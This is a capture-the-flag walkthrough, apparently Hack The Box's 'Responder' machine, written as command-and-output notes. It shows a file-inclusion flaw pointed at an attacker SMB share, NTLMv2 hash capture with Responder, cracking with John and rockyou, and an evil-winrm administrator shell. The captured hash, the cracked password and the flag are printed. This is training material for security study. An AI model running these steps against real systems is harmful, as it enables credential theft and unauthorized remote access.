04.RESPONDER (RFI, NTLM CAPTURE, PW CRACKING & WINRM)

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ sudo nmap -sV -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 80/tcp   open  http    Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
 5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 
 * Typically '-sV' is used with Nmap to determine versions, but that's not always enough. 
    - adding the -sC is another good way to determine service versions
       - the -sC option will run safe scripts which are designed to provide useful 
         information without being too intrusive or causing harm to the target systems.

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 80,5985
 PORT   STATE SERVICE VERSION
 80/tcp   open  http    Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
 |_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
 5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 |_http-title: Not Found
 |_http-server-header: Microsoft-HTTPAPI/2.0
 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 80,5985
 PORT   STATE SERVICE
 80/tcp   open  http
 |_http-trace: TRACE is enabled
 |_http-dombased-xss: Couldn't find any DOM based XSS.
 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
 |_http-csrf: Couldn't find any CSRF vulnerabilities.
 |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
 | http-enum: 
 |   /css/: Potentially interesting directory w/ listing on 'apache/2.4.52 (win64) openssl/1.1.1m php/8.1.1'
 |   /icons/: Potentially interesting folder w/ directory listing
 |   /img/: Potentially interesting directory w/ listing on 'apache/2.4.52 (win64) openssl/1.1.1m php/8.1.1'
 |   /inc/: Potentially interesting directory w/ listing on 'apache/2.4.52 (win64) openssl/1.1.1m php/8.1.1'
 |_  /js/: Potentially interesting directory w/ listing on 'apache/2.4.52 (win64) openssl/1.1.1m php/8.1.1'
 5985/tcp open  wsman

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD/COMPROMISE

Submit root flag
#walk the application and identify potential entry points
root@htb:~$ BROWSER > {targetIP:port}
 * identified domain as unika.htb
 
root@htb:~$ echo "10.129.16.1     unika.htb" | sudo tee -a /etc/hosts
 10.129.16.1     unika.htb
 
root@htb:~$ BROWSER > http://unika.htb

 * possible vulnerable entry points
    - contact web form
       - could be vulnerable to XSS, etc
    - page parameter
       - could be vulnerable to LFI/RFI
#test for vulnerabilities: LFI/RFI
root@htb:~$ BROWSER > http://unika.htb/index.php?page=127.0.0.1
 Warning: include(127.0.0.1): Failed to open stream: No such file or directory in C:\xampp\htdocs\index.php on line 11
 Warning: include(): Failed opening '127.0.0.1' for inclusion (include_path='\xampp\php\PEAR') in C:\xampp\htdocs\index.php on line 11
 
 * page errors could indicate posibility of LFI
 
root@htb:~$ BROWSER > http://unika.htb/index.php?page=\Windows\System32\drivers\etc\hosts
 # Copyright (c) 1993-2009 Microsoft Corp. # # This is a sample HOSTS file used by Microsoft TCP/IP for Windows. # # This file contains the mappings of IP addresses to host names. Each # entry should be kept on an individual line. The IP address should # be placed in the first column followed by the corresponding host name. # The IP address and the host name should be separated by at least one # space. # # Additionally, comments (such as these) may be inserted on individual # lines or following the machine name denoted by a '#' symbol. # # For example: # # 102.54.94.97 rhino.acme.com # source server # 38.25.63.10 x.acme.com # x client host # localhost name resolution is handled within DNS itself. # 127.0.0.1 localhost # ::1 localhost 
 
 * ALT: add path traversal in testing if the first method didn't work
    - http://unika.htb/index.php?page=..\..\..\..\Windows\System32\drivers\etc\hosts
#set up a malicious smb server
root@htb:~$ which responder
 /usr/sbin/responder
 
root@htb:~$ locate Responder.conf
 /etc/responder/Responder.conf
 /usr/share/responder/Responder.conf

root@htb:~$ cat /etc/responder/Responder.conf 
 [Responder Core]

 ; Servers to start
 SQL = On
 SMB = On
  
 * ensure Responder is set to listen for SMB requests.
 
#start a malicious SMB server
root@htb:~$ ifconfig
 tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
 inet 10.10.14.215  netmask 255.255.254.0  destination 10.10.14.215

root@htb:~$ sudo responder -I tun0
 NBT-NS, LLMNR & MDNS Responder 3.1.3.0
 ...
 [+] Listening for events...
 ...


#capture ntlm/ntlmv2 challenge and response
root@htb:~$ BROWSER > http://unika.htb/index.php?page=//10.10.14.215/somefile
 Warning: include(\\10.10.14.215\SOMEFILE): Failed to open stream: Permission denied in C:\xampp\htdocs\index.php on line 11
 Warning: include(): Failed opening '//10.10.14.215/somefile' for inclusion (include_path='\xampp\php\PEAR') in C:\xampp\htdocs\index.php on line 11

 * somefile doesn't exist in the malicious smb server from the attacker
    - responder will capture the smb challenge & response from the victim when
      it tries to connect to the malicous smb server to grab the non-existent
      file named "somefile"
      
 * ALT:
    - can create a malicious php code that can be passed to the target for RCE

RESPONDER...
 NBT-NS, LLMNR & MDNS Responder 3.1.3.0
 ...
 [+] Listening for events...
 [SMB] NTLMv2-SSP Client   : 10.129.16.1
 [SMB] NTLMv2-SSP Username : RESPONDER\Administrator
 [SMB] NTLMv2-SSP Hash     : Administrator::RESPONDER:a94235c50a1196f9:8CE0037C7F6C7000BF06CF534E3373C2:010100000000000000DF815F9284DB01B3126883A8CBDB2E00000000020008004E0031005500320001001E00570049004E002D005300350041005A005A0030003200580044004C004C0004003400570049004E002D005300350041005A005A0030003200580044004C004C002E004E003100550032002E004C004F00430041004C00030014004E003100550032002E004C004F00430041004C00050014004E003100550032002E004C004F00430041004C000700080000DF815F9284DB0106000400020000000800300030000000000000000100000000200000C4D24F968CC4766174734C562F245966630F53C6F2067E1E9D98970A2E4D3A4A0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003200310035000000000000000000
 
 * captured challenge/response from the target which was trying to connect
   to the malicious smb server from the attacker
#crack captured challenge/response hash
root@htb:~$ echo "Administrator::RESPONDER:a94235c50a1196f9:8CE0037C7F6C7000BF06CF534E3373C2:010100000000000000DF815F9284DB01B3126883A8CBDB2E00000000020008004E0031005500320001001E00570049004E002D005300350041005A005A0030003200580044004C004C0004003400570049004E002D005300350041005A005A0030003200580044004C004C002E004E003100550032002E004C004F00430041004C00030014004E003100550032002E004C004F00430041004C00050014004E003100550032002E004C004F00430041004C000700080000DF815F9284DB0106000400020000000800300030000000000000000100000000200000C4D24F968CC4766174734C562F245966630F53C6F2067E1E9D98970A2E4D3A4A0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003200310035000000000000000000" | sudo tee -a target.txt

root@htb:~$ locate rockyou.txt
 /usr/share/wordlists/rockyou.txt
root@htb:~$ cp /usr/share/wordlists/rockyou.txt .
root@htb:~$ john -w=rockyou.txt target.txt
 Using default input encoding: UTF-8
 Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
 Will run 4 OpenMP threads
 Press 'q' or Ctrl-C to abort, almost any other key for status
 badminton        (Administrator)     
 1g 0:00:00:00 DONE (2025-02-21 19:36) 100.0g/s 409600p/s 409600c/s 409600C/s slimshady..oooooo
 Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
 Session completed.
#connect to the target with the obtained credentials
root@htb:~$ which evil-winrm
 /usr/bin/evil-winrm
root@htb:~$ evil-winrm -i 10.129.16.1 -u administrator -p badminton
 Evil-WinRM shell v3.5
 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
 Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completio
 Info: Establishing connection to remote endpoint
 
 *Evil-WinRM* PS C:\Users\Administrator\Documents> dir c:\users\
 
    Directory: C:\users
 
 Mode                 LastWriteTime         Length Name
 ----                 -------------         ------ ----
 d-----          3/9/2022   5:35 PM                Administrator
 d-----          3/9/2022   5:33 PM                mike
 d-r---        10/10/2020  12:37 PM                Public
 
 *Evil-WinRM* PS C:\Users\Administrator\Documents> dir c:\users\mike\desktop
 
    Directory: C:\users\mike\desktop

 Mode                 LastWriteTime         Length Name
 ----                 -------------         ------ ----
 -a----         3/10/2022   4:50 AM             32 flag.txt
 
 *Evil-WinRM* PS C:\Users\Administrator\Documents> type c:\users\mike\desktop\flag.txt
   ea81b7afddd03efaa0945333ed147fac
Previous03.CROCODILE (FTP & WEB FORM LOGIN)Next05.THREE (AWS S3 BUCKET)

Last updated